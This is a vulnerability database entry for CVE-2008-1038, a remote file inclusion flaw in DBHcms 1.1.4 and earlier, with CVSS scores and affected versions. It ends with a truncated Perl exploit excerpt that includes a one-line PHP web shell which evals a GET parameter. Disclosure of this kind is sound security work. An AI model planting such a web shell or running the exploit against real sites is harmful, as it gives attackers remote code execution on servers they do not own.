6.8
CVSSv2

CVE-2008-1038

Published: 27/02/2008 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in mod/mod.extmanager.php in DBHcms 1.1.4 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the extmanager_install parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

drbenhur.com dbhcms 1.1.3

drbenhur.com dbhcms 1.1.4

Exploits

#!/usr/bin/perl # DBHcms <= 114 Remote File Inclusion exploit # Vendor url: wwwdrbenhurcom # # exploit is hard to execute through a browser -possible though- since it's with POST # ~Iron # wwwrandombasecom require LWP::UserAgent; #Shell: # <?php if(!empty($_GET['do'])){eval($_GET['do']);}?> $shell_url = "loc ...